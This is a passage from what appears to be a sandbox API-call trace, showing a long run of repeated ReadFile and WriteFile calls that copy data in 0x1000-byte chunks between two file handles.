lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.069] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.069] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.069] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.069] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.069] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.069] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.070] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.070] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.070] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.070] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.070] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.070] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.070] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.167] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.168] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.168] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.168] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.168] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.168] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.168] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.168] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.168] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.169] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.169] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.169] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.169] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.169] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.169] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.169] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.170] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.170] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.170] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.170] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.170] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.170] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.170] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.171] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.171] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.171] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.171] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.171] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.171] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.171] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.171] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.172] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.173] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.173] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.174] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.175] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.175] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.175] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.175] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.175] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.175] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.175] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.175] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.176] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.176] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.176] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.176] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.176] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.176] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.176] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.177] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.178] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.178] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.178] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.178] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.178] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.178] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.179] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.179] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.179] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.179] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.179] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.179] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.179] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.180] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.181] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 